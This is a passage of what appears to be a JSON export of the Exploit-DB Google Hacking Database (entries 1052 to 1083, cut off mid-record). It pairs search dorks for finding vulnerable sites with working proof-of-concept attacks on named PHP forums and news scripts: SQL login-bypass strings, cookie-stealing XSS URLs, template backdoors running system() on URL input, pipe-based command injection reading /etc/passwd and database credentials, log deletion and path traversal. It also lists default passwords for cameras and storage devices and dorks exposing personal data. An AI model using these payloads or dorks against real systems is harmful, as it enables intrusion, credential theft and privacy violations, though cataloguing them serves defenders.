v1.1 (possibly prior versions) Remote code execution, SQL Injection / Login Bypass, cross site scripting, path disclosure poc software: author site: http://www.gravityboardx.com/ a) Sql Injection / Login Bypass: If magic_quotes off, A user can bypass login check and grant administrator privileges on target system: login: ' or isnull(1/0) /* password: whatever b) Cross site scripting poc: b.1)After he login as administrator he can edit template to insert evil javascript code. Try to insert at the end of the template these lines: alert(document.cookie) b.2)A user can craft a malicious url like this to access target user cookies: http://[target]/[path]/deletethread.php?board_id=\">alert(document.cookie) c) Remote commands/php code execution: c.1) Always editing the template, attacker can leave a backdoor in target system, example, at the end of template: After, the attacker can launch commands by this urls: http://[target]/[path]/index.php?cmd=ls%20-la to list directories... http://[target]/[path]/index.php?cmd=cat%20/etc/passwd to see Unix /etc/passwd file http://[target]/[path]/index.php?cmd=cat%20config.php to see database username/password c.2) An IMPORTANT NOTE: You can edit template without to be logged in as administator, calling editcss.php script, look at the code of this script: if($fp = fopen('gbxfinal.css','w')){ fwrite($fp, $csscontent); fclose($fp); echo ''; }else{ echo 'Gravity Board X was unable to save changes to the CSS template.'; } you can easily deface the forum and/or insert a backdoor calling an url like this: http://[target]/[path]/editcss.php?csscontent= then execute commands: http://[target]/[path]/index?cmd=[command] It's also possible to disclose path: d) path disclosure: http://[target]/[path]/deletethread.php?perm=1 http://[target]/[path]/ban.php http://[target]/[path]/addnews.php http://[target]/[path]/banned.php http://[target]/[path]/boardstats.php http://[target]/[path]/adminform.php http://[target]/[path]/forms/admininfo.php http://[target]/[path]/forms/announcements.php http://[target]/[path]/forms/banform.php ans so on...calling scripts in /forms directory" }, { "signatureReferenceNumber": "1052", "link": "https://www.exploit-db.com/ghdb/1052/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=it&c2coff=1&q=%22Powered+by+SilverNews%22&btnG=Cerca&lr=", "shortDescription": "\"Powered by SilverNews\"", "textualDescription": "silvernews 2.0.3 (possibly previous versions ) SQL Injection / Login Bypass / Remote commands execution / cross site scripting software: author site: http://www.silver-scripts.de/scripts.php?l=en&script=SilverNews SQL Injection / Login bypass: A user can bypass admin password check, if magic_quotes is set to off: user: ' or isnull(1/0) /* pass: whatever remote commands execution: now, new admin can edit template, clicking on Templates -> Global footer, can add the lines: //*********************************************** TEMPLATE; } } system($HTTP_GET_VARS[command]); /* to leave a backdoor in template file /templates/tpl_global.php now can launch system commands on the target system with theese urls: http://[target]/[path]//templates/tpl_global.php?command=ls%20-la to list directories http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/etc/passwd to see /etc/passwd file http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/[path_to_config_file]/data.inc.php to see Mysql database password cross site scripting: same way, a user can hide evil javascript code in template" }, { "signatureReferenceNumber": "1053", "link": "https://www.exploit-db.com/ghdb/1053/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?q=PHPFreeNews+inurl:Admin.php&hl=it&lr=&filter=0", "shortDescription": "PHPFreeNews inurl:Admin.php", "textualDescription": "29/07/2005 8.36.03PHPFreeNews Version 1.32 (& previous) sql injection/login bypass, cross site scripting, path disclosure, information disclosure author site: http://www.phpfreenews.co.uk/Main_Intro.phpxss poc:http://[target]/[path]/inc/Footer.php?ScriptVersion=alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&NewsDir=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableRatings=1&NewsDir=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&NewsDir=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&PopupWidth=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&PopupHeight=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&PopupWidth=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&PopupHeight=\")}//-->alert(document.cookie)also a user can craft a url to redirect a victim to an evil site:http://[target]/[path]/inc/Logout.php?AdminScript=http://[evil_site]/[evil_script]path disclosure:http://[target]/[path]/inc/ArchiveOldNews.phphttp://[target]/[path]/inc/Categories.phphttp://[target]/[path]/inc/CheckLogout.phphttp://[target]/[path]/inc/CommentsApproval.phphttp://[target]/[path]/inc/Images.phphttp://[target]/[path]/inc/NewsList.phphttp://[target]/[path]/inc/Password.phphttp://[target]/[path]/inc/Post.phphttp://[target]/[path]/inc/PostsApproval.phphttp://[target]/[path]/inc/PurgeOldNews.phphttp://[target]/[path]/inc/SetSticky.phphttp://[target]/[path]/inc/SetVisible.phphttp://[target]/[path]/inc/Statistics.phphttp://[target]/[path]/inc/Template.phphttp://[target]/[path]/inc/UserDefinedCodes.phphttp://[target]/[path]/inc/Users.phpinformation disclosure:googledork:PHPFreeNews inurl:Admin.php(with this, you can passively fingerprint the server, PHP & MySQL version are in Google description...because this info are shownwed with non-chalance in admin.php page ;) )default password:login: Adminpass: AdminMySQL Injection / Login Bypass in previous versions:login: Adminpassword: ') or isnull(1/0) or ('a'='anote: all string, not consider 'or'in 1.32 version LoginUsername and LoginPassword vars are addslashed... but, try this: login: whateverpass: //') or isnull(1/0) /* this is definetely patched in 1.40 version" }, { "signatureReferenceNumber": "1054", "link": "https://www.exploit-db.com/ghdb/1054/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=it&q=inurl%3Anquser.php+filetype%3Aphp&btnG=Cerca+con+Google&meta=", "shortDescription": "inurl:nquser.php filetype:php", "textualDescription": "Netquery 3.1 remote commands execution, cross site scripting, information disclosure poc exploit software: author site: http://www.virtech.org/tools/ a user can execute command on target system by PING panel, if enabled like often happens, using pipe char on input text \"Ping IP Address or Host Name\", example: | cat /etc/passwd then you will see plain text password file | pwd to see current path | rm [pwd_output]/logs/nq_log.txt to delete log file... disclosure of user activity: if enabled, a user can view clear text log file through url: http://[target]/[path]/logs/nq_log.txt xss: http://[target]/[path]/submit.php?portnum=\"/>alert(document.cookie) http://[target]/[path]/nqgeoip2.php?step=alert(document.cookie) http://[target]/[path]/nqgeoip2.php?body=alert(document.cookie) http://[target]/[path]/nqgeoip.php?step=alert(document.cookie) http://[target]/[path]/nqports.php?step=alert(document.cookie) http://[target]/[path]/nqports2.php?step=alert(document.cookie) http://[target]/[path]/nqports2.php?body=alert(document.cookie) http://[target]/[path]/portlist.php?portnum=alert(document.cookie) a user can use on-line Netquery installations like proxy servers to launch exploit from HTTP GET request panel, example: exploiting Phpbb 2.0.15: make a get request of http://[vulnerable_server]/[path]/viewtopic.php?t=[existing_topic]&highlight='.system($HTTP_GET_VARS[command].'&command=cat%20/etc/passwd" }, { "signatureReferenceNumber": "1055", "link": "https://www.exploit-db.com/ghdb/1055/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=it&q=%22Powered+By%3A+Simplicity+oF+Upload%22+inurl%3Adownload.php+%7C+inurl%3Aupload.php&btnG=Cerca+con+Google&meta=", "shortDescription": "\"Powered By: Simplicity oF Upload\" inurl:download.php | inurl:upload.php", "textualDescription": "26/07/2005 16.09.18Simplicity OF Upload 1.3 (possibly prior versons) remote code execution & cross site scriptingsoftware: author site: http://www.phpsimplicity.com/scripts.php?id=3remote commands execution:problem at line 25-30: ...//check for language overriding..if (isset($_GET['language'])) $language = strtolower($_GET['language']);//now we include the language filerequire_once(\"$language.lng\");...you can include whatever adding a null byte to \"language\" parameter value:example:http://localhost:30/simply/download.php?language=upload.php%00you will see upload & download page together :)so you can upload a cmd.gif (when you upload a .php file, usually it isrenamed to .html...) file with this php code inside to executecommands:then try this url:http://[target]/[path]/download.php?language=cmd.gif%00&command=lsto list directorieshttp://[target]/[path]/download.php?language=cmd.gif%00&command=cat%20/etc/passwdto show /etc/passwd filecross site scripting:also, a remote user can supply a specially crafted URL to redirect other peopleto an evil page:http://[target]/[path]/download.php?language=http://[evil_site]/[evil_page]%00googledork:\"Powered By: Simplicity oF Upload\"" }, { "signatureReferenceNumber": "1056", "link": "https://www.exploit-db.com/ghdb/1056/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=it&q=%22Powered+by+FlexPHPNews%22+inurl%3Anews+%7C+inurl%3Apress&meta=", "shortDescription": "\"Powered by FlexPHPNews\" inurl:news | inurl:press", "textualDescription": "24/07/2005 2.38.13Flex PHPNews 0.0.4 login bypass/ sql injection, cross site scripting & resource consumption poc exploitsoftware:author site:http://www.china-on-site.com/flexphpnews/downloads.phpxss / cookie disclosure:http://[target]/[path]/index.php?front_indextitle=alert(document.cookie)http://[target]/[path]/index.php?front_searchsubmit=\">alert(document.cookie)http://[target]/[path]/index.php?front_latestnews=\">alert(document.cookie)http://[target]/[path]/news.php?newsid=\">alert(document.cookie)http://[target]/[path]/news.php?front_rating=\">alert(document.cookie)http://[target]/[path]/news.php?salt=\">alert(document.cookie)http://[target]/[path]/news.php?front_letmerateit=\">alert(document.cookie)http://[target]/[path]/news.php?front_ratebest=\">alert(document.cookie)http://[target]/[path]/news.php?front_ratesubmit=\">alert(document.cookie)http://[target]/[path]/news.php?front_searchsubmit=\">alert(document.cookie)http://[target]/[path]/search.php?front_searchresult=alert(document.cookie)http://[target]/[path]/search.php?front_searchsubmit=\">alert(document.cookie)http://[target]/[path]/catalog.php?front_searchsubmit=\">alert(document.cookie)http://[target]/[path]/catalog.php?front_latestnews=\">alert(document.cookie)http://[target]/[path]/catalog.php?catalogid=\">alert(document.cookie)path disclosure:http://[target]/[path]/admin/usercheck.php?logincheck=%00denial of service / resources consumption:http://[target]/[path]/news.php?prenumber=99999999999999999999999999999999http://[target]/[path]/news.php?nextnumber=99999999999999999999999999999999($prenumber and $nextnumber are uninitialized final values of a loop...) sql injection / bypass authentication:go to login page:http://[target]/[path]/admin/(usually admin if not changed)login as user: ' OR 'a'='aand pass : ' OR 'a'='a boom! you're admin ...the problem is in usercheck.php at line 5:$sql = \"select username from newsadmin where username='$checkuser' and password='$checkpass'\";you can post always true statements, like 'a'='a'solution: replace $checkuser and $checkpass vars with your username and pass, by the moment" }, { "signatureReferenceNumber": "1057", "link": "https://www.exploit-db.com/ghdb/1057/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=it&q=%22Powered+by+FunkBoard%22&btnG=Cerca+con+Google&meta=", "shortDescription": "\"Powered by FunkBoard\"", "textualDescription": "FunkBoard V0.66CF (possibly prior versions) cross site scripting, possible database username/password disclosure & board takeover, possible remote code execution software: author site: http://www.[path_to_funkboard].co.uk/ xss: http://[target]/[path_to_funkboard]/editpost.php?fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/editpost.php?fbpassword=\">alert(document.cookie) http://[target]/[path_to_funkboard]/prefs.php?fbpassword=\">alert(document.cookie) http://[target]/[path_to_funkboard]/prefs.php?fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbpassword=\">alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&subject=\">alert(document.cookie) http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbpassword=\">alert(document.cookie) http://[target]/[path_to_funkboard]/profile.php?fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/profile.php?fbpassword=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?fmail=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?www=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?icq=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?yim=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?location=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?sex=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?interebbies=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?sig=alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?aim=\">alert(document.cookie) path disclosure: http://[target]/[path_to_funkboard]/images/forums.php database username & password disclosure: during installation is not remembered to delete the mysql_install script and the installation do not delete it, usually: http://[target]/[path]/admin/mysql_install.php or http://[target]/[path]/admin/pg_install.php there, a user can see database clear text username & password ... Then, the script let the user proceed to the next page, where he can reset funkboard administator username & password. Now the script faults, because some tables exist, etc. So user can go back and setting a new database name for installation, guessing among other installations on the server... Once Installation succeeded he can set new admin username e password then login at this page: http://[target]/[path]/[path_to_funkboard]/admin/index.php Now the user can edit templates and append some evil javascript code. remote code execution: look at this code in mysql_install.php : $infoout = \" so, you have a backdoor on target system... you can launch commands by this urls: http://localhost:30/funkboard/info.php?command=ls%20-la to list directories... http://localhost:30/funkboard/info.php?command=cat%20/etc/passwd to see /etc/passwd file" }, { "signatureReferenceNumber": "1058", "link": "https://www.exploit-db.com/ghdb/1058/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=%22Summary+View+of+Sensors%22+%7C+%22sensorProbe8+v+*%22+%7C+%22cameraProbe+3.0%22+-filetype:pdf+-filetype:html++-site:ihackstuff.com&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "\"Summary View of Sensors\" | \"sensorProbe8 v *\" | \"cameraProbe 3.0\" -filetype:pdf -filetype:html", "textualDescription": "sensorProbe is a SNMP enabled and Web based Environmental Monitoring Device. The sensors attached to this device can monitor temperature, humidity, water leakage and air flow, etc. It does support other sensors which can monitor voltage drop, security, analog and dry contacts. The sensorProbe monitors your equipment's environmental variations, and alerts you through \"Email , SMS or SNMP Alerts in your Network Management system\" in advance and prevent any disaster." }, { "signatureReferenceNumber": "1059", "link": "https://www.exploit-db.com/ghdb/1059/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22Cisco+CallManager+User+Options+Log+On%22+%22Please+enter+your+User+ID+and+Password+in+the+spaces+provided+below+and+click+the+Log+On+button+to+continue.%22++-edu&num=100&lr=&newwindow=1&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:\"Cisco CallManager User Options Log On\" \"Please enter your User ID and Password in the spaces provided below and click the Log On button to co", "textualDescription": "[quote]Cisco CallManagerCallManager is a FREE web application/interface included with your VoIP telephone service. It allows you to change and update settings on your phone without having to contact the Telecommunications Help Desk.Voice over IP telephone users \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u201cLogon to Cisco CallManager at: http://XXXXXX/ccmuser/logon.asp* User ID \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u201c your UWYO Domain username* Password \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u201c initial password is 12341234Please create your own unique password after your initial logon[/quote]There are several vulnerbilities for CallManager" }, { "signatureReferenceNumber": "1060", "link": "https://www.exploit-db.com/ghdb/1060/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=inurl%3Aindex.php+fees+shop+link.codes+merchantAccount+&btnG=Search", "shortDescription": "inurl:index.php fees shop link.codes merchantAccount", "textualDescription": "Vulnerability in EPay systemsPHP code includinghttp://targeturl/index.php?read=../../../../../../../../../../../../../../etc/passwdadvisory:http://www.cyberlords.net/advisories/cl_epay.txtEPay Pro version 2.0 is vulnerable to this issue." }, { "signatureReferenceNumber": "1061", "link": "https://www.exploit-db.com/ghdb/1061/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22admin+panel%22+%2B%22Powered+by+RedKernel%22+-site%3Aihackstuff.com&btnG=Search", "shortDescription": "intitle:\"admin panel\" +\"Powered by RedKernel\"", "textualDescription": "This finds all versions of RedKernel Referer Tracker(stats page) it just gives out some nice info" }, { "signatureReferenceNumber": "1062", "link": "https://www.exploit-db.com/ghdb/1062/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=intitle%3Aphpnews.login+&btnG=Search", "shortDescription": "intitle:phpnews.login", "textualDescription": "Vulnerable script auth.php (SQL injection)--- from rst.void.ru ---Possible scenario of attack:[1] log in admin panel, using SQL injection[2] upload PHP file through \"Upload Images\" function (index.php?action=images) and have fun with php shellor edit template (index.php?action=modtemp) and put backdoor code into it.-------------------------http://www.securityfocus.com/bid/14333/infohttp://rst.void.ru/papers/advisory31.txtThe version number may be found sometimes in error messages." }, { "signatureReferenceNumber": "1063", "link": "https://www.exploit-db.com/ghdb/1063/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=+intitle%3A%22blog+torrent+upload%22+&sstart=0&start=0&ie=utf-8&oe=utf-8", "shortDescription": "intitle:\"blog torrent upload\"", "textualDescription": "Blog Torrent is free, open-source software that provides a way to share large files on your website.vulnerability: free access to the password filehttp://[target]/[path_of_blog]/data/newusersadvisory:http://www.securitytracker.com/alerts/2005/Jul/1014449.htmlAll current versions could be vulnerable depending on directory permissions." }, { "signatureReferenceNumber": "1064", "link": "https://www.exploit-db.com/ghdb/1064/", "category": "Footholds", "querystring": "http://www.google.com/search?hl=en&lr=&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=intitle%3AMyShell+1.1.0+build+20010923&btnG=Search", "shortDescription": "intitle:MyShell 1.1.0 build 20010923", "textualDescription": "Basicly MyShell is a php program that allows you to execute commands remotely on whichever server it's hosted on." }, { "signatureReferenceNumber": "1065", "link": "https://www.exploit-db.com/ghdb/1065/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:Network%2BStorage%2BLink%2Bfor%2BUSB%2B2.0+Disks+intext:Disks+User+Log+in+(Private+Data)+++DISK+(Private+Data)+FLASH+(Public+Data)+Firmware+Version++&hl=en&hs=Yms&lr=&client=firefox-a&rls=org.mozilla:en-US:official&", "shortDescription": "intitle:\"Network Storage Link for USB 2.0 Disks\" Firmware", "textualDescription": "Networked USB hard drives (NSLU2). Be sure to disable Google's filter (&filters=0) as that is where they pop up. Default password (Linksys) is admin:admin (just like all the rest). A majority are locked some are not. Some logins to the NSLU2 will be a link off a website. Enjoy." }, { "signatureReferenceNumber": "1066", "link": "https://www.exploit-db.com/ghdb/1066/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&q=intitle%3A%22AlternC+Desktop%22", "shortDescription": "intitle:\"AlternC Desktop\"", "textualDescription": "This finds the login page for AlternC Desktop I dont know what versions." }, { "signatureReferenceNumber": "1067", "link": "https://www.exploit-db.com/ghdb/1067/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22communigate+pro+*+*%22+intitle%3A%22entrance%22&btnG=Search", "shortDescription": "intitle:\"communigate pro * *\" intitle:\"entrance\"", "textualDescription": "Just reveals the login for Communigate Pro webmail. A brute force attack could be attempted. The directory link from this page can in some instances be used to query user information." }, { "signatureReferenceNumber": "1068", "link": "https://www.exploit-db.com/ghdb/1068/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=%22inspanel%22+intitle:%22login%22+-%22cannot%22+%22Login+ID%22+-site:inspediumsoft.com&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "\"inspanel\" intitle:\"login\" -\"cannot\" \"Login ID\" -site:inspediumsoft.com", "textualDescription": "This finds all versions of the inspanel login page." }, { "signatureReferenceNumber": "1069", "link": "https://www.exploit-db.com/ghdb/1069/", "category": "Various Online Devices", "querystring": "http://www.google.ca/search?hl=en&q=intitle%3AiDVR+-intitle%3A%22com+%7C+net+%7C+shop%22+-inurl%3A%22asp+%7C+htm+%7C+pdf+%7C+html+%7C+php+%7C+shtml+%7C+com+%7C+at+%7C+cgi+%7C+tv%22&btnG=Google+Search&meta=", "shortDescription": "intitle:iDVR -intitle:\"com | net | shop\" -inurl:\"asp | htm | pdf | html | php | shtml | com | at | cgi | tv\"", "textualDescription": "Online camera. Default login is administrator and password blank. Video server runs default on port 2000. There is an application DVR Center that is used to connect to server and manage recorded videos." }, { "signatureReferenceNumber": "1070", "link": "https://www.exploit-db.com/ghdb/1070/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=%22HostingAccelerator%22+intitle:%22login%22+%2B%22Username%22+-%22news%22+-demo&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "\"HostingAccelerator\" intitle:\"login\" +\"Username\" -\"news\" -demo", "textualDescription": "This will find the login portal for HostingAccelerator ControlPanel I have not looked for exploits for these so i dont know if their are any. So far i have seen versions 1.9 2.2 and 2.4 found by this dork." }, { "signatureReferenceNumber": "1071", "link": "https://www.exploit-db.com/ghdb/1071/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22INTELLINET%22+intitle:%22IP+Camera+Homepage%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:\"INTELLINET\" intitle:\"IP Camera Homepage\"", "textualDescription": "This googledork finds INTELLINET ip cameras. They are used to monitor things and have a web interface. Most of the pages load with the default username and password of guest. The user manual says that the default admin username/password is admin/admin. At the time of posting this googledork had 10 results. p.s. This was discovered by jeffball55 and cleaned up by golfo" }, { "signatureReferenceNumber": "1072", "link": "https://www.exploit-db.com/ghdb/1072/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=it&q=%22Powered+by+Zorum+3.5%22&meta=", "shortDescription": "\"Powered by Zorum 3.5\"", "textualDescription": "Zorum 3.5 remote code execution poc exploitsoftware:description: Zorum is a freely available, open source Web-based forumapplication implemented in PHP. It is available for UNIX, Linux, and any otherplatform that supports PHP script execution.author site: http://zorum.phpoutsourcing.com/1) remote code execution:vulnerable code, in /gorum/prod.php file:07 $doubleApp = isset($argv[1]); ...14 if( $doubleApp )15 {16 $appDir = $argv[1];17 system(\"mkdir $prodDir/$appDir\"); ...a user can execute arbitrary commands using pipe char, example:http://[target]/zorum/gorum/prod.php?argv[1]=|ls%20-lato list directorieshttp://[target]/zorum/gorum/prod.php?argv[1]=|cat%20../config.phpto see database username/password...http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20/etc/passwdto see /etc/passwd file2) path disclosure:http://[target]/zorum/gorum/notification.phphttp://[target]/zorum/user.phphttp://[target]/zorum/attach.phphttp://[target]/zorum/blacklist.phphttp://[target]/zorum/forum.phphttp://[target]/zorum/globalstat.phphttp://[target]/zorum/gorum/trace.phphttp://[target]/zorum/gorum/badwords.phphttp://[target]/zorum/gorum/flood.phpand so on...googledork:\"Powered by Zorum 3.5\"rgodsite: http://rgod.altervista.orgmail: retrogod at aliceposta itoriginal advisory: http://rgod.altervista.org/zorum.html" }, { "signatureReferenceNumber": "1073", "link": "https://www.exploit-db.com/ghdb/1073/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22xams+0.0.0..15+-+Login%22&btnG=Google+Search", "shortDescription": "intitle:\"xams 0.0.0..15 - Login\"", "textualDescription": "This is the login for xams it should catch from 0.0.1-0.0.150.0.15 being the latest version as far as I can see their is only versions 0.0.13 0.0.14 and 0.0.15" }, { "signatureReferenceNumber": "1074", "link": "https://www.exploit-db.com/ghdb/1074/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22curriculum+vitae%22+filetype%3Adoc&btnG=Google+Search", "shortDescription": "intitle:\"curriculum vitae\" filetype:doc", "textualDescription": "Hello. 1. It reveals personal datas, often private addresses, phone numbers, e-mails, how many children one has:). Full curriculum vitae. I tried many verions of it:inurl:\"pl\" intitle:\"curriculum vitae\" filetype:docinurl:\"uk\" intitle:\"curriculum vitae\" filetype:docinurl:\"nl\" intitle:\"curriculum vitae\" filetype:doc, etc. in order to get national results,alsointitle:\"curriculum vitae\" ext:(doc | rtf )However filetype:doc version gives the most results. 2. You can always do someting with someone phone number, date and place of birth, etc. I placed this string in the forum, but nobody answered me :(. GreetingsphilYps. you have something similar in your GHDB, but different.\"Click here for the Google search ==> \"phone * * *\" \"address *\" \"e-mail\" intitle:\"curriculum vitae\"(opens in new window)Added: Thursday, August 19, 2004hits: 24771\"" }, { "signatureReferenceNumber": "1075", "link": "https://www.exploit-db.com/ghdb/1075/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&c2coff=1&q=%22There+seems+to+have+been+a+problem+with+the%22+%22+Please+try+again+by+clicking+the+Refresh+button+in+your+web+browser.%22&btnG=Search", "shortDescription": "\"There seems to have been a problem with the\" \" Please try again by clicking the Refresh button in your web browser.\"", "textualDescription": "search reveals database errors on vbulletin sites. View the page source and you can get information about the sql query executed, this can help in all manner of ways depending on the query." }, { "signatureReferenceNumber": "1076", "link": "https://www.exploit-db.com/ghdb/1076/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&q=inurl%3AcsCreatePro.cgi&btnG=Google+Search", "shortDescription": "inurl:csCreatePro.cgi", "textualDescription": "Create Pro logon pages." }, { "signatureReferenceNumber": "1077", "link": "https://www.exploit-db.com/ghdb/1077/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by+FUDForum+2.6%22+-site%3Afudforum.org+-johnny.ihackstuff&btnG=Search", "shortDescription": "\"Powered by FUDForum 2.6\" -site:fudforum.org -johnny.ihackstuff", "textualDescription": "FUDforum is prone to a remote arbitrary PHP file upload vulnerability.An attacker can merge an image file with a script file and upload it to an affected server.This issue can facilitate unauthorized remote access.FUDforum versions prior to 2.7.1 are reported to be affected. Currently Symantec cannot confirm if version 2.7.1 is affected as well.Affected versions:2.6.15 _ 2.6.14 _ 2.6.132.6.12 _ 2.6.10 _ 2.6.9 _ 2.6.82.6.7 _ 2.6.5 _ 2.6.4 _ 2.6.32.6.2 _ 2.6.1 _ 2.6" }, { "signatureReferenceNumber": "1078", "link": "https://www.exploit-db.com/ghdb/1078/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:%22Looking+Glass+v20040427%22+%22When+verifying+an+URL+check+one+of+those%22+&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:\"Looking Glass v20040427\" \"When verifying an URL check one of those\"", "textualDescription": "Looking Glass v20040427 arbitrary commands execution / cross site scripting. description: Looking Glass is a pretty extensive web based network querying tool for use on php enabled servers. site: http://de-neef.net/articles.php?id=2&page=1download page: http://de-neef.net/download.php?file=2Read the full report here: http://rgod.altervista.org/lookingglass.html" }, { "signatureReferenceNumber": "1079", "link": "https://www.exploit-db.com/ghdb/1079/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&q=contacts+ext%3Awml+&btnG=Google+Search", "shortDescription": "contacts ext:wml", "textualDescription": "Forget Bluetooth Hacking! You'll be amazed, at how many people sync their Cell Phones to the same Computers they run some type of Server on. This Query literally gives you access to peoples private contact lists that are ether on there Smart Phones', or on their Windows CE wireless devices.An attacker could Spoof Emails with the \"SIG\" details of the persons Phone firmware, or simply collect the cellular numbers for something later on down the road.I even hypotheticlly came across some private text messages!" }, { "signatureReferenceNumber": "1080", "link": "https://www.exploit-db.com/ghdb/1080/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22NetCam+Live+Image%22+-.edu+-.gov+-johnny.ihackstuff.com&num=100&hl=en&lr=&c2coff=1&filter=0", "shortDescription": "intitle:\"NetCam Live Image\" -.edu -.gov -johnny.ihackstuff.com", "textualDescription": "This is a googledork for StarDot netcams. You can watch these cams and if you have the admin password you can change configurations and other settings. They have a default admin name/pass but I haven't taken the time to figure it out." }, { "signatureReferenceNumber": "1081", "link": "https://www.exploit-db.com/ghdb/1081/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22Content+Management+System%22+%22user+name%22%7C%22password%22%7C%22admin%22+%22Microsoft+IE+5.5%22+-mambo+-johnny.ihackstuff&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:\"Content Management System\" \"user name\"|\"password\"|\"admin\" \"Microsoft IE 5.5\" -mambo -johnny.ihackstuff", "textualDescription": "iCMS - Content Management System...Create websites without knowing HTML or web programming." }, { "signatureReferenceNumber": "1082", "link": "https://www.exploit-db.com/ghdb/1082/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=phpLDAPadmin+intitle%3AphpLDAPadmin+filetype%3Aphp+inurl%3Atree.php+%7C+inurl%3Alogin.php+%7C+inurl%3Adonate.php+%280.9.6+%7C+0.9.7%29", "shortDescription": "phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php (0.9.6 | 0.9.7)", "textualDescription": "phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure,remote code execution, cross site scriptingsoftware:author site: http://phpldapadmin.sourceforge.net/description: phpLDAPadmin is a web-based LDAP client. It provides easy,anywhere-accessible, multi-language administration for your LDAP serverIf unpatched and vulnerable, a user can see any file on target system. A user can also execute arbitrary php code and system commands or craft a malicious url to include malicious client side code that will be executed in the security contest of the victim browser." }, { "signatureReferenceNumber": "1083", "link": "https://www.exploit-db.com/ghdb/1083/", "category": "Advisories and Vulnerabilities", "querystring": 